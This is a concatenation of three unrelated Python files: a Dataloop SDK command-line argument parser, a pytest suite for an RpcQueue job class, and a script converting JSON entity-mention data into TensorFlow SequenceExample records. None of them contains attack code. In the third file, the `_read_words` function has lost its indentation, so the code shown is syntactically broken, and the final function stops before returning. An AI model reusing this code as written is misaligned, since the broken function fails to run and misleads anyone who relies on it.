    exposes its own action sub-parser under a dest named after the entity.

    :return: configured argparse.ArgumentParser
    """
    parser = argparse.ArgumentParser(
        description="CLI for Dataloop",
        formatter_class=argparse.RawTextHelpFormatter
    )

    ###############
    # sub parsers #
    ###############
    subparsers = parser.add_subparsers(dest="operation", help="supported operations")

    #########
    # shell #
    #########
    subparsers.add_parser("shell", help="Open interactive Dataloop shell")

    ###########
    # upgrade #
    ###########
    # fix: this banner previously duplicated the "shell" label
    a = subparsers.add_parser("upgrade", help="Update dtlpy package")
    optional = a.add_argument_group("optional named arguments")
    optional.add_argument("-u", "--url", metavar='\b', help="Package url. default 'dtlpy'", default=None)

    ##################
    # Login / Logout #
    ##################
    subparsers.add_parser("logout", help="Logout")
    subparsers.add_parser("login", help="Login using web Auth0 interface")
    a = subparsers.add_parser("login-token", help="Login by passing a valid token")
    required = a.add_argument_group("required named arguments")
    required.add_argument(
        "-t", "--token", metavar='\b', help="valid token", required=True
    )
    a = subparsers.add_parser("login-secret", help="Login client id and secret")
    required = a.add_argument_group("required named arguments")
    required.add_argument(
        "-e", "--email", metavar='\b', help="user email", required=False, default=None
    )
    required.add_argument(
        "-p", "--password", metavar='\b', help="user password", required=False, default=None
    )
    required.add_argument(
        "-i", "--client-id", metavar='\b', help="client id", required=False, default=None
    )
    required.add_argument(
        "-s", "--client-secret", metavar='\b', help="client secret", required=False, default=None
    )
    a = subparsers.add_parser("login-m2m", help="Login client id and secret")
    required = a.add_argument_group("required named arguments")
    required.add_argument(
        "-e", "--email", metavar='\b', help="user email", required=False, default=None
    )
    required.add_argument(
        "-p", "--password", metavar='\b', help="user password", required=False, default=None
    )
    required.add_argument(
        "-i", "--client-id", metavar='\b', help="client id", required=False, default=None
    )
    required.add_argument(
        "-s", "--client-secret", metavar='\b', help="client secret", required=False, default=None
    )

    ########
    # Init #
    ########
    subparsers.add_parser("init", help="Initialize a .dataloop context")

    ##################
    # Checkout state #
    ##################
    subparsers.add_parser("checkout-state", help="Print checkout state")

    ########
    # Help #
    ########
    subparsers.add_parser("help", help="Get help")

    ###########
    # version #
    ###########
    parser.add_argument("-v", "--version", action="store_true", help="dtlpy version")
    subparsers.add_parser("version", help="DTLPY SDK version")

    #######
    # API #
    #######
    subparser = subparsers.add_parser("api", help="Connection and environment")
    subparser_parser = subparser.add_subparsers(dest="api", help="gate operations")
    # ACTIONS #
    # info
    subparser_parser.add_parser("info", help="Print api information")
    # setenv
    a = subparser_parser.add_parser("setenv", help="Set platform environment")
    required = a.add_argument_group("required named arguments")
    required.add_argument("-e", "--env", metavar='\b', help="working environment", required=True)

    ############
    # Projects #
    ############
    subparser = subparsers.add_parser("projects", help="Operations with projects")
    subparser_parser = subparser.add_subparsers(
        dest="projects", help="projects operations"
    )
    # ACTIONS #
    # list
    subparser_parser.add_parser("ls", help="List all projects")
    # create
    a = subparser_parser.add_parser("create", help="Create a new project")
    required = a.add_argument_group("required named arguments")
    required.add_argument("-p", "--project-name", metavar='\b', help="project name")
    # checkout
    a = subparser_parser.add_parser("checkout", help="checkout a project")
    required = a.add_argument_group("required named arguments")
    required.add_argument("-p", "--project-name", metavar='\b', help="project name")
    # open web
    a = subparser_parser.add_parser("web", help="Open in web browser")
    optional = a.add_argument_group("optional named arguments")
    optional.add_argument("-p", "--project-name", metavar='\b', help="project name")

    ############
    # Datasets #
    ############
    subparser = subparsers.add_parser("datasets", help="Operations with datasets")
    subparser_parser = subparser.add_subparsers(dest="datasets", help="datasets operations")
    # ACTIONS #
    # open web
    a = subparser_parser.add_parser("web", help="Open in web browser")
    optional = a.add_argument_group("optional named arguments")
    optional.add_argument("-p", "--project-name", metavar='\b', help="project name")
    optional.add_argument("-d", "--dataset-name", metavar='\b', help="dataset name")
    # list
    a = subparser_parser.add_parser("ls", help="List of datasets in project")
    optional = a.add_argument_group("optional named arguments")
    optional.add_argument("-p", "--project-name", metavar='\b', default=None,
                          help="project name. Default taken from checked out (if checked out)")
    # create
    a = subparser_parser.add_parser("create", help="Create a new dataset")
    required = a.add_argument_group("required named arguments")
    required.add_argument("-d", "--dataset-name", metavar='\b', help="dataset name", required=True)
    optional = a.add_argument_group("optional named arguments")
    optional.add_argument("-p", "--project-name", metavar='\b', default=None,
                          help="project name. Default taken from checked out (if checked out)")
    optional.add_argument("-c", "--checkout", action='store_true', default=False, help="checkout the new dataset")
    # checkout
    a = subparser_parser.add_parser("checkout", help="checkout a dataset")
    required = a.add_argument_group("required named arguments")
    required.add_argument("-d", "--dataset-name", metavar='\b', help="dataset name")
    optional = a.add_argument_group("optional named arguments")
    optional.add_argument("-p", "--project-name", metavar='\b', default=None,
                          help="project name. Default taken from checked out (if checked out)")

    #########
    # items #
    #########
    subparser = subparsers.add_parser("items", help="Operations with items")
    subparser_parser = subparser.add_subparsers(dest="items", help="items operations")
    # ACTIONS #
    # open web
    a = subparser_parser.add_parser("web", help="Open in web browser")
    required = a.add_argument_group("required named arguments")
    required.add_argument("-r", "--remote-path", metavar='\b', help="remote path")
    optional = a.add_argument_group("optional named arguments")
    optional.add_argument("-p", "--project-name", metavar='\b', help="project name")
    optional.add_argument("-d", "--dataset-name", metavar='\b', help="dataset name")
    # list
    a = subparser_parser.add_parser("ls", help="List of items in dataset")
    optional = a.add_argument_group("optional named arguments")
    optional.add_argument("-p", "--project-name", metavar='\b', default=None,
                          help="project name. Default taken from checked out (if checked out)")
    optional.add_argument("-d", "--dataset-name", metavar='\b', default=None,
                          help="dataset name. Default taken from checked out (if checked out)")
    optional.add_argument("-o", "--page", metavar='\b', help="page number (integer)", default=0)
    optional.add_argument("-r", "--remote-path", metavar='\b', help="remote path", default=None)
    optional.add_argument("-t", "--type", metavar='\b', help="Item type", default=None)
    # upload
    a = subparser_parser.add_parser("upload", help="Upload directory to dataset")
    required = a.add_argument_group("required named arguments")
    required.add_argument("-l", "--local-path", required=True, metavar='\b',
                          help="local path")
    optional = a.add_argument_group("optional named arguments")
    optional.add_argument("-p", "--project-name", metavar='\b', default=None,
                          help="project name. Default taken from checked out (if checked out)")
    optional.add_argument("-d", "--dataset-name", metavar='\b', default=None,
                          help="dataset name. Default taken from checked out (if checked out)")
    optional.add_argument("-r", "--remote-path", metavar='\b', default=None,
                          help="remote path to upload to. default: /")
    optional.add_argument("-f", "--file-types", metavar='\b', default=None,
                          help='Comma separated list of file types to upload, e.g ".jpg,.png". default: all')
    optional.add_argument("-lap", "--local-annotations-path", metavar='\b', default=None,
                          help="Path for local annotations to upload with items")
    optional.add_argument("-ow", "--overwrite", dest="overwrite", action='store_true', default=False,
                          help="Overwrite existing item")
    # download
    a = subparser_parser.add_parser("download", help="Download dataset to a local directory")
    optional = a.add_argument_group("optional named arguments")
    optional.add_argument("-p", "--project-name", metavar='\b', default=None,
                          help="project name. Default taken from checked out (if checked out)")
    optional.add_argument("-d", "--dataset-name", metavar='\b', default=None,
                          help="dataset name. Default taken from checked out (if checked out)")
    optional.add_argument("-ao", "--annotation-options", metavar='\b',
                          help="which annotation to download. options: json,instance,mask", default=None)
    optional.add_argument("-aft", "--annotation-filter-type", metavar='\b',
                          help="annotation type filter when downloading annotations. "
                               "options: box,segment,binary etc", default=None)
    optional.add_argument("-afl", "--annotation-filter-label", metavar='\b',
                          help="labels filter when downloading annotations.", default=None)
    optional.add_argument("-r", "--remote-path", metavar='\b', default=None,
                          help="remote path to upload to. default: /")
    optional.add_argument("-ow", "--overwrite", action='store_true', default=False,
                          help="Overwrite existing item")
    optional.add_argument("-t", "--not-items-folder", action='store_true', default=False,
                          help="Download WITHOUT 'items' folder")
    optional.add_argument("-wt", "--with-text", action='store_true', default=False,
                          help="Annotations will have text in mask")
    optional.add_argument("-th", "--thickness", metavar='\b', default="1",
                          help="Annotation line thickness")
    optional.add_argument("-l", "--local-path", metavar='\b', default=None,
                          help="local path")
    optional.add_argument("-wb", "--without-binaries", action='store_true', default=False,
                          help="Don't download item binaries")

    ##########
    # videos #
    ##########
    subparser = subparsers.add_parser("videos", help="Operations with videos")
    subparser_parser = subparser.add_subparsers(dest="videos", help="videos operations")
    # ACTIONS #
    # play
    a = subparser_parser.add_parser("play", help="Play video")
    optional = a.add_argument_group("optional named arguments")
    optional.add_argument(
        "-l",
        "--item-path",
        metavar='\b',
        default=None,
        help="Video remote path in platform. e.g /dogs/dog.mp4",
    )
    optional.add_argument(
        "-p",
        "--project-name",
        metavar='\b',
        default=None,
        help="project name. Default taken from checked out (if checked out)",
    )
    optional.add_argument(
        "-d",
        "--dataset-name",
        metavar='\b',
        default=None,
        help="dataset name. Default taken from checked out (if checked out)",
    )
    # upload
    a = subparser_parser.add_parser("upload", help="Upload a single video")
    required = a.add_argument_group("required named arguments")
    required.add_argument(
        "-f", "--filename", metavar='\b', help="local filename to upload", required=True
    )
    required.add_argument(
        "-p", "--project-name", metavar='\b', help="project name", required=True
    )
    required.add_argument(
        "-d", "--dataset-name", metavar='\b', help="dataset name", required=True
    )
    optional = a.add_argument_group("optional named arguments")
    optional.add_argument(
        "-r", "--remote-path", metavar='\b', help="remote path", default="/"
    )
    # split video to chunks
    optional.add_argument(
        "-sc",
        "--split-chunks",
        metavar='\b',
        default=None,
        help="Video splitting parameter: Number of chunks to split",
    )
    optional.add_argument(
        "-ss",
        "--split-seconds",
        metavar='\b',
        default=None,
        # fix: typo "chuck" -> "chunk"
        help="Video splitting parameter: Seconds of each chunk",
    )
    optional.add_argument(
        "-st",
        "--split-times",
        metavar='\b',
        default=None,
        help="Video splitting parameter: List of seconds to split at. e.g 600,1800,2000",
    )
    # encode
    optional.add_argument(
        "-e",
        "--encode",
        action="store_true",
        default=False,
        help="encode video to mp4, remove bframes and upload",
    )

    ############
    # Services #
    ############
    subparser = subparsers.add_parser("services", help="Operations with services")
    subparser_parser = subparser.add_subparsers(dest="services", help="services operations")
    # ACTIONS #
    # execute
    a = subparser_parser.add_parser("execute", help="Create an execution")
    optional = a.add_argument_group("optional named arguments")
    optional.add_argument("-f", "--function-name", dest="function_name", default=None,
                          help="which function to run")
    optional.add_argument("-s", "--service-name", dest="service_name", default=None,
                          help="which service to run")
    optional.add_argument("-pr", "--project-name", dest="project_name", default=None,
                          help="Project name")
    optional.add_argument("-as", "--async", dest="asynchronous", default=True, action='store_false',
                          help="Async execution ")
    optional.add_argument("-i", "--item-id", dest="item_id", default=None,
                          help="Item input")
    optional.add_argument("-d", "--dataset-id", dest="dataset_id", default=None,
                          help="Dataset input")
    optional.add_argument("-a", "--annotation-id", dest="annotation_id", default=None,
                          help="Annotation input")
    optional.add_argument("-in", "--inputs", dest="inputs", default='{}',
                          help="Dictionary string input")
    # tear-down
    a = subparser_parser.add_parser(
        "tear-down", help="tear-down service of service.json file"
    )
    optional = a.add_argument_group("optional named arguments")
    optional.add_argument("-l", "--local-path", dest="local_path", default=None,
                          help="path to service.json file")
    optional.add_argument("-pr", "--project-name", dest="project_name", default=None,
                          help="Project name")
    # ls
    a = subparser_parser.add_parser("ls", help="List project's services")
    optional = a.add_argument_group("optional named arguments")
    optional.add_argument("-pr", "--project-name", dest="project_name", default=None,
                          help="Project name")
    optional.add_argument("-pkg", "--package-name", dest="package_name", default=None,
                          help="Package name")
    # log
    a = subparser_parser.add_parser("log", help="Get services log")
    # fix: group was mislabeled "required named arguments" for optional flags
    optional = a.add_argument_group("optional named arguments")
    optional.add_argument("-pr", "--project-name", dest="project_name", default=None,
                          help="Project name")
    # fix: help text previously said "Project name" for the service flag
    optional.add_argument("-f", "--service-name", dest="service_name", default=None,
                          help="Service name")
    optional.add_argument("-t", "--start", dest="start", default=None,
                          help="Log start time")
    # delete
    a = subparser_parser.add_parser("delete", help="Delete Service")
    optional = a.add_argument_group("optional named arguments")
    optional.add_argument("-f", "--service-name", dest="service_name", default=None,
                          help="Service name")
    optional.add_argument("-p", "--project-name", dest="project_name", default=None,
                          help="Project name")
    optional.add_argument("-pkg", "--package-name", dest="package_name", default=None,
                          help="Package name")

    ############
    # Triggers #
    ############
    subparser = subparsers.add_parser("triggers", help="Operations with triggers")
    subparser_parser = subparser.add_subparsers(dest="triggers", help="triggers operations")
    # ACTIONS #
    # create
    a = subparser_parser.add_parser("create", help="Create a Service Trigger")
    required = a.add_argument_group("required named arguments")
    required.add_argument("-r", "--resource", dest="resource",
                          help="Resource name", required=True)
    required.add_argument("-a", "--actions", dest="actions", help="Actions", required=True)
    optional = a.add_argument_group("optional named arguments")
    optional.add_argument("-p", "--project-name", dest="project_name", default=None,
                          help="Project name")
    optional.add_argument("-pkg", "--package-name", dest="package_name", default=None,
                          help="Package name")
    optional.add_argument("-f", "--service-name", dest="service_name",
                          help="Service name", default=None)
    optional.add_argument("-n", "--name", dest="name",
                          help="Trigger name", default=None)
    optional.add_argument("-fl", "--filters", dest="filters", default='{}',
                          help="Json filter")
    optional.add_argument("-fn", "--function-name", dest="function_name", default='run',
                          help="Function name")
    # delete
    a = subparser_parser.add_parser("delete", help="Delete Trigger")
    required = a.add_argument_group("required named arguments")
    required.add_argument("-t", "--trigger-name", dest="trigger_name", default=None,
                          help="Trigger name", required=True)
    optional = a.add_argument_group("optional named arguments")
    optional.add_argument("-f", "--service-name", dest="service_name", default=None,
                          help="Service name")
    optional.add_argument("-p", "--project-name", dest="project_name", default=None,
                          help="Project name")
    optional.add_argument("-pkg", "--package-name", dest="package_name", default=None,
                          help="Package name")
    # ls
    a = subparser_parser.add_parser("ls", help="List triggers")
    optional = a.add_argument_group("optional named arguments")
    optional.add_argument("-pr", "--project-name", dest="project_name", default=None,
                          help="Project name")
    optional.add_argument("-pkg", "--package-name", dest="package_name", default=None,
                          help="Package name")
    optional.add_argument("-s", "--service-name", dest="service_name", default=None,
                          help="Service name")

    ##########
    # Deploy #
    ##########
    a = subparsers.add_parser("deploy", help="deploy with json file")
    required = a.add_argument_group("required named arguments")
    required.add_argument("-f", dest="json_file", default=None,
                          help="Path to json file")
    required.add_argument("-p", dest="project_name", default=None,
                          help="Project name")

    ############
    # Generate #
    ############
    a = subparsers.add_parser("generate", help="generate a json file")
    optional = a.add_argument_group("optional named arguments")
    # fix: typo "cataluge" -> "catalog"
    optional.add_argument("--option", dest="package_type", default=None,
                          help="catalog of examples")
    optional.add_argument("-p", "--package-name", dest="package_name", default=None,
                          help="Package name")

    ############
    # packages #
    ############
    subparser = subparsers.add_parser("packages", help="Operations with packages")
    subparser_parser = subparser.add_subparsers(
        dest="packages", help="package operations"
    )
    # ACTIONS #
    # ls
    a = subparser_parser.add_parser("ls", help="List packages")
    optional = a.add_argument_group("optional named arguments")
    optional.add_argument("-p", "--project-name", dest="project_name", default=None,
                          help="Project name")
    # push
    a = subparser_parser.add_parser("push", help="Create package in platform")
    optional = a.add_argument_group("optional named arguments")
    # fix: these help strings were copy-pasted from an unrelated flag
    # ("Revision to deploy if selected True")
    optional.add_argument("-src", "--src-path", metavar='\b', default=None,
                          help="Path to package source code")
    optional.add_argument("-cid", "--codebase-id", metavar='\b', default=None,
                          help="Codebase id to push")
    optional.add_argument("-pr", "--project-name", metavar='\b', default=None,
                          help="Project name")
    optional.add_argument("-p", "--package-name", metavar='\b', default=None,
                          help="Package name")
    # test
    a = subparser_parser.add_parser(
        "test", help="Tests that Package locally using mock.json"
    )
    optional = a.add_argument_group("optional named arguments")
    optional.add_argument("-c", "--concurrency", metavar='\b', default=10,
                          help="Number of concurrent executions")
    optional.add_argument("-f", "--function-name", metavar='\b', default='run',
                          help="Function to test")
    # checkout
    a = subparser_parser.add_parser("checkout", help="checkout a package")
    required = a.add_argument_group("required named arguments")
    required.add_argument("-p", "--package-name", metavar='\b', help="package name")
    # delete
    a = subparser_parser.add_parser(
        "delete", help="Delete Package"
    )
    optional = a.add_argument_group("optional named arguments")
    optional.add_argument("-pkg", "--package-name", dest="package_name", default=None,
                          help="Package name")
    optional.add_argument("-p", "--project-name", dest="project_name", default=None,
                          help="Project name")

    #########
    # Shell #
    #########
    # ls
    subparsers.add_parser("ls", help="List directories")
    # pwd
    subparsers.add_parser("pwd", help="Get current working directory")
    # cd
    subparser = subparsers.add_parser("cd", help="Change current working directory")
    subparser.add_argument(dest='dir')
    # mkdir
    subparser = subparsers.add_parser("mkdir", help="Make directory")
    subparser.add_argument(dest='name')
    # clear
    subparsers.add_parser("clear", help="Clear shell")

    ########
    # Exit #
    ########
    subparsers.add_parser("exit", help="Exit interactive shell")
    return parser
|
<gh_stars>0
import pytest
from sciutils.jobs import RpcQueue, local
from collections import deque
class MockQueue(object):
    """Minimal in-process FIFO exposing the queue interface RpcQueue expects."""

    def __init__(self):
        self._items = deque()

    def put(self, obj):
        # enqueue at the tail
        self._items.append(obj)

    def get(self):
        # dequeue from the head (FIFO order)
        return self._items.popleft()

    def __len__(self):
        return len(self._items)
# Queue implementation injected into RpcQueue by the fixtures below.
MOCK_QUEUE_CLASS = MockQueue
class MockObject(object):
    """Registrable stand-in whose methods echo back (self, args, kwargs)."""
    def __init__(self, rpc_id):
        # rpc_id doubles as the registration key (see test_register)
        self.rpc_id = rpc_id
    def mock_method(self, *args, **kwargs):
        # plain method: returns its own call signature for inspection
        return self, args, kwargs
    @local
    def remote_method(self, *args, **kwargs):
        # decorated with sciutils.jobs.local -- NOTE(review): presumably runs
        # locally until the object is wrapped by an RpcQueue (see
        # test_wrap_target, where the wrapped call returns None); confirm
        # against the sciutils.jobs implementation.
        return self, args, kwargs
@pytest.fixture
def queue():
    # fresh RpcQueue backed by the in-memory MockQueue
    return RpcQueue(queue=MOCK_QUEUE_CLASS)
@pytest.fixture
def queue_with_obj():
    # RpcQueue plus a registered MockObject, returned as a (queue, obj) pair
    q = RpcQueue(queue=MOCK_QUEUE_CLASS)
    mo = MockObject(123)
    q.register(mo)
    return q, mo
def test_initial_state(queue):
    """A fresh queue has no producers or consumers and is not finished."""
    assert (queue.n_producers, queue.n_consumers) == (0, 0)
    assert not queue.is_finished
def test_register(queue_with_obj):
    """A registered object is keyed by its rpc_id."""
    q, obj = queue_with_obj
    assert q.get_object_key(obj) == obj.rpc_id
def test_counting_producers(queue):
    """Producer count tracks add/remove; consumers and finished stay untouched."""
    steps = (
        (queue.add_producer, 1),
        (queue.add_producer, 2),
        (queue.remove_producer, 1),
        (queue.remove_producer, 0),
    )
    for action, expected in steps:
        action()
        assert queue.n_producers == expected
        assert queue.n_consumers == 0
        assert not queue.is_finished
def test_counting_consumers(queue):
    """Consumer count tracks add/remove; producers and finished stay untouched."""
    steps = (
        (queue.add_consumer, 1),
        (queue.add_consumer, 2),
        (queue.remove_consumer, 1),
        (queue.remove_consumer, 0),
    )
    for action, expected in steps:
        action()
        assert queue.n_consumers == expected
        assert queue.n_producers == 0
        assert not queue.is_finished
def test_put(queue_with_obj):
    """put() enqueues exactly one entry."""
    q, obj = queue_with_obj
    before = len(q._queue)
    q.put(obj.mock_method)
    assert len(q._queue) == before + 1
def test_put_raw(queue_with_obj):
    """put_raw() with explicit (obj, method, args, kwargs) enqueues one entry."""
    q, obj = queue_with_obj
    before = len(q._queue)
    q.put_raw(obj, obj.mock_method, (), {})
    assert len(q._queue) == before + 1
def test_get(queue_with_obj):
    """get() returns the bound method plus the original call arguments."""
    q, obj = queue_with_obj
    call_args = (1, 2)
    call_kwargs = {'kw1': 1, 'kw2': 2}
    q.put(obj.mock_method, *call_args, **call_kwargs)
    method, got_args, got_kwargs = q.get()
    assert method.__self__ == obj
    assert method == obj.mock_method
    assert got_args == call_args
    assert got_kwargs == call_kwargs
def test_finish(queue):
    """finish() marks the queue done and emits one token per consumer."""
    consumers = 3
    for _ in range(consumers):
        queue.add_consumer()
    queue.finish()
    assert queue.is_finished
    tokens = [queue._queue.get() for _ in range(consumers)]
    assert tokens == [RpcQueue.FINISHED_TOKEN] * consumers
def test_wrap_method(queue_with_obj):
    """wrap_method() yields a callable that enqueues instead of executing."""
    q, obj = queue_with_obj
    call_args = (1, 2)
    call_kwargs = {'kw1': 1, 'kw2': 2}
    wrapped = q.wrap_method(obj.remote_method)
    assert callable(wrapped)
    wrapped(obj, *call_args, **call_kwargs)
    assert q.get() == (obj.remote_method, call_args, call_kwargs)
def test_wrap_target(queue_with_obj):
    """wrap_target() reroutes @local methods through the queue; plain methods
    keep executing directly."""
    q, obj = queue_with_obj
    call_args = (1, 2)
    call_kwargs = {'kw1': 1, 'kw2': 2}
    q.wrap_target(obj)
    # plain method still runs locally and returns its call signature
    assert obj.mock_method(*call_args, **call_kwargs) == (obj, call_args, call_kwargs)
    # @local method is intercepted: no local result, call lands on the queue
    assert obj.remote_method(*call_args, **call_kwargs) is None
    assert q.get() == (obj.remote_method, call_args, call_kwargs)
<gh_stars>10-100
"""
Convert sanitized json data to tfrecord data format.
"""
import sys
import collections
import json
import pickle
import numpy as np
import tensorflow as tf
def invert_dict(dictionary):
    """
    Return a new dict mapping each value of `dictionary` back to its key.
    """
    return dict((value, key) for key, value in dictionary.items())
def _read_words(filepath):
"""
Return word list in tokens of json file.
"""
words = []
with open(filepath, 'r', encoding='utf-8') as file_p:
for row in file_p:
words.extend(json.loads(row)['tokens'])
counter = collections.Counter(words)
count_pairs = sorted(counter.items(), key=lambda x: (-x[1], str(x[0])))
words, counts = list(zip(*count_pairs))
return words, counts
def _read_mention_chars(filepath, remove_below):
    """
    Build a character -> id mapping over all mention surface strings in a
    json-lines file.

    Characters seen fewer than `remove_below` times are dropped. Ids start
    at 1 (0 is reserved for padding); two sentinel entries, 'unk' and
    'eos', are appended after the real characters.
    """
    counter = collections.Counter()
    with open(filepath, 'r', encoding='utf-8') as file_p:
        for row in file_p:
            json_data = json.loads(row)
            tokens = json_data['tokens']
            for mention in json_data['mentions']:
                # count every character of the space-joined mention span
                counter.update(' '.join(tokens[mention['start']:mention['end']]))
    # frequency-descending, character-ascending; drop infrequent characters
    ordered = sorted(counter.items(), key=lambda item: (-item[1], item[0]))
    kept = [char for char, count in ordered if count >= remove_below]
    # 0th id is reserved for padding, so enumeration starts at 1
    num_to_chrs = dict(enumerate(kept, 1))
    # unknown-character and end-of-mention sentinels come last
    num_to_chrs[len(num_to_chrs) + 1] = 'unk'
    num_to_chrs[len(num_to_chrs) + 1] = 'eos'
    chrs_to_num = invert_dict(num_to_chrs)
    return chrs_to_num
def load_filtered_embeddings(filepath, word_list):
    """
    Load pre-trained word vectors for the words in `word_list` (plus 'unk').

    The embedding file is space-separated text: `word v1 v2 ... vn`, one
    word per line. Row 0 of the returned matrix is left all-zero (padding);
    kept words are numbered from 1 in file order.

    :param filepath: path to the embedding text file (must contain 'unk')
    :param word_list: iterable of words to keep
    :return: (word_to_num, pre_trained_embeddings, word_not_found)
    :raises KeyError: if the embedding file has no 'unk' entry
    """
    word_dic = {}
    word_found = set()
    word_set = set(word_list)
    with open(filepath, 'r', encoding='utf-8') as file_p:
        for line in file_p:
            splits = line.split(' ')
            word = splits[0]
            if word in word_set or word == 'unk':
                word_dic[word] = [float(x) for x in splits[1:]]
                word_found.add(word)
    word_not_found = word_set.difference(word_found)
    # enumeration will start from 1; row 0 of the matrix stays zero (padding)
    word_to_num = dict(zip(word_dic.keys(), range(1, len(word_dic) + 1)))
    # fix: np.core.numerictypes was removed in NumPy 2.0 -- use np.float32,
    # which is the same dtype
    pre_trained_embeddings = np.zeros((len(word_to_num) + 1, len(word_dic['unk'])),
                                      dtype=np.float32)
    for word in word_to_num:
        pre_trained_embeddings[word_to_num[word]] = word_dic[word]
    return word_to_num, pre_trained_embeddings, word_not_found
def generate_labels_to_numbers(dataset, sanitized_directory):
    """
    Map each label in <sanitized_directory><dataset>/sanitized_labels.txt
    (one label per line) to its line number, starting at 0.
    """
    labels_path = sanitized_directory + dataset + '/sanitized_labels.txt'
    with open(labels_path, 'r') as file_p:
        label_list = file_p.read().split('\n')
    return {label: index for index, label in enumerate(label_list)}
def generate_features_to_numbers(dataset, sanitized_directory):
    """
    Map POS tags and dependency types to line numbers.

    Reads sanitized_pos.txt and sanitized_dep_type.txt (one entry per line)
    from <sanitized_directory><dataset>/ and returns the two mappings,
    each entry keyed to its 0-based line index.
    """
    def _numbered(filename):
        # entry -> line index, starting at 0
        with open(sanitized_directory + dataset + '/' + filename, 'r') as file_p:
            entries = file_p.read().split('\n')
        return {entry: index for index, entry in enumerate(entries)}

    return _numbered('sanitized_pos.txt'), _numbered('sanitized_dep_type.txt')
def labels_status(labels):
    """
    Return 1 if every label is a substring of the deepest label, else 0.

    The deepest label is the one with the most '/' separators; a mention is
    "clean" when all of its labels lie on that single type path.
    """
    deepest = max(labels, key=lambda label: label.count('/'))
    return 1 if all(label in deepest for label in labels) else 0
#pylint: disable-msg=R0914
def make_tf_record_f1(json_data, mention, mappings):
    """
    A tfrecord per mention (format f1).

    Builds a tf.train.SequenceExample for one mention. In this format the
    left and right contexts both INCLUDE the mention span, the mention
    surface string is encoded character-by-character with a trailing 'eos'
    id, and POS / dependency-type sequences are emitted for both contexts.

    :param json_data: sentence dict with 'tokens', 'pos', 'dep', 'fileid'
        and 'senid' keys
    :param mention: dict with 'start'/'end' token offsets and 'labels'
    :param mappings: lookup tables -- 'wtn' word->id, 'ctn' char->id,
        'ptn' pos->id, 'dttn' dep-type->id, 'ltn' label->index
    :return: populated tf.train.SequenceExample
    """
    start = mention['start']
    end = mention['end']
    tokens = json_data['tokens']
    poss = json_data['pos']
    dep_types = json_data['dep']
    # unique id: fileid_senid_start_end
    uid = bytes('_'.join([json_data['fileid'],
                          str(json_data['senid']),
                          str(start),
                          str(end)
                          ]), 'utf-8')
    # lc and rc include mention
    left_context = tokens[:end]
    entity = tokens[start:end]
    right_context = tokens[start:]
    left_poss = poss[:end]
    right_poss = poss[start:]
    left_dts = dep_types[:end]
    right_dts = dep_types[start:]
    ex = tf.train.SequenceExample()
    # scalar context features: id, sequence lengths, clean/noisy flag
    ex.context.feature["uid"].bytes_list.value.append(uid)
    ex.context.feature["lcl"].int64_list.value.append(len(left_context))
    ex.context.feature["rcl"].int64_list.value.append(len(right_context))
    # +1 accounts for the 'eos' id appended to the character sequence below
    ex.context.feature["eml"].int64_list.value.append(len(' '.join(entity)) + 1)
    ex.context.feature["clean"].int64_list.value.append(labels_status(mention['labels']))
    lc_ids = ex.feature_lists.feature_list["lci"]
    rc_ids = ex.feature_lists.feature_list["rci"]
    em_ids = ex.feature_lists.feature_list["emi"]
    l_pos_ids = ex.feature_lists.feature_list["lpi"]
    r_pos_ids = ex.feature_lists.feature_list["rpi"]
    l_dt_ids = ex.feature_lists.feature_list["ldti"]
    r_dt_ids = ex.feature_lists.feature_list["rdti"]
    label_list = ex.feature_lists.feature_list["labels"]
    # context word ids; unknown words fall back to the 'unk' id
    for word in left_context:
        lc_ids.feature.add().int64_list.value.append(mappings['wtn'].get(word,
                                                                         mappings['wtn']['unk']))
    for word in right_context:
        rc_ids.feature.add().int64_list.value.append(mappings['wtn'].get(word,
                                                                         mappings['wtn']['unk']))
    # mention characters, terminated with the 'eos' id
    for char in ' '.join(entity):
        em_ids.feature.add().int64_list.value.append(mappings['ctn'].get(char,
                                                                         mappings['ctn']['unk']))
    em_ids.feature.add().int64_list.value.append(mappings['ctn']['eos'])
    for pos in left_poss:
        l_pos_ids.feature.add().int64_list.value.append(mappings['ptn'][pos])
    for pos in right_poss:
        r_pos_ids.feature.add().int64_list.value.append(mappings['ptn'][pos])
    for dep_type in left_dts:
        l_dt_ids.feature.add().int64_list.value.append(mappings['dttn'][dep_type['type']])
    for dep_type in right_dts:
        # small hack, get(dep_type, 0) need to fix this when doing transfer learning
        # with Wiki and OntoNotes dataset
        # conj:uh not found in Wiki dataset
        # For all other experiments, this will not affect
        r_dt_ids.feature.add().int64_list.value.append(mappings['dttn'].get(dep_type['type'], 0))
    # multi-hot label vector in ltn index order
    temp_labels = [0] * len(mappings['ltn'])
    for label in mention['labels']:
        temp_labels[mappings['ltn'][label]] = 1
    for label in temp_labels:
        label_list.feature.add().int64_list.value.append(label)
    return ex
#pylint: disable-msg=R0914
def make_tf_record_f2(json_data, mention, mappings, mention_window, context_window):
    """
    Build one tf.train.SequenceExample for a single mention.

    Args:
        json_data: Parsed sentence record with 'tokens', 'fileid' and 'senid'.
        mention: Mention dict with 'start', 'end' and 'labels'.
        mappings: Lookup tables; uses 'wtn' (word->id) and 'ltn' (label->id).
        mention_window: Max mention tokens kept (falsy keeps all).
        context_window: Max context width on each side (falsy keeps all).

    Returns:
        A tf.train.SequenceExample with context features uid/lcl/rcl/eml/clean
        and sequence features lci/rci/emi/labels.
    """
    span_start = mention['start']
    span_end = mention['end']
    tokens = json_data['tokens']
    uid = bytes('_'.join([json_data['fileid'],
                          str(json_data['senid']),
                          str(span_start),
                          str(span_end)
                         ]), 'utf-8')
    # Left/right contexts exclude the mention itself, as in the AKBC paper.
    left_context = tokens[:span_start]
    right_context = tokens[span_end:]
    if context_window:
        left_context = left_context[-context_window:]
        right_context = right_context[:context_window]
    entity = tokens[span_start:span_end]
    if mention_window:
        entity = entity[:mention_window]
    ex = tf.train.SequenceExample()
    context = ex.context.feature
    context["uid"].bytes_list.value.append(uid)
    context["lcl"].int64_list.value.append(len(left_context))
    context["rcl"].int64_list.value.append(len(right_context))
    context["eml"].int64_list.value.append(len(entity))
    # This will only be used in representations experiment.
    context["clean"].int64_list.value.append(labels_status(mention['labels']))
    word_ids = mappings['wtn']
    unk_id = word_ids['unk']
    feature_lists = ex.feature_lists.feature_list
    # Each token stream becomes a sequence of word ids (unknowns -> 'unk').
    for list_name, words in (("lci", left_context),
                             ("rci", right_context),
                             ("emi", entity)):
        seq = feature_lists[list_name]
        for word in words:
            seq.feature.add().int64_list.value.append(word_ids.get(word, unk_id))
    # One-hot label vector, emitted as a sequence of 0/1 ints.
    one_hot = [0] * len(mappings['ltn'])
    for label in mention['labels']:
        one_hot[mappings['ltn'][label]] = 1
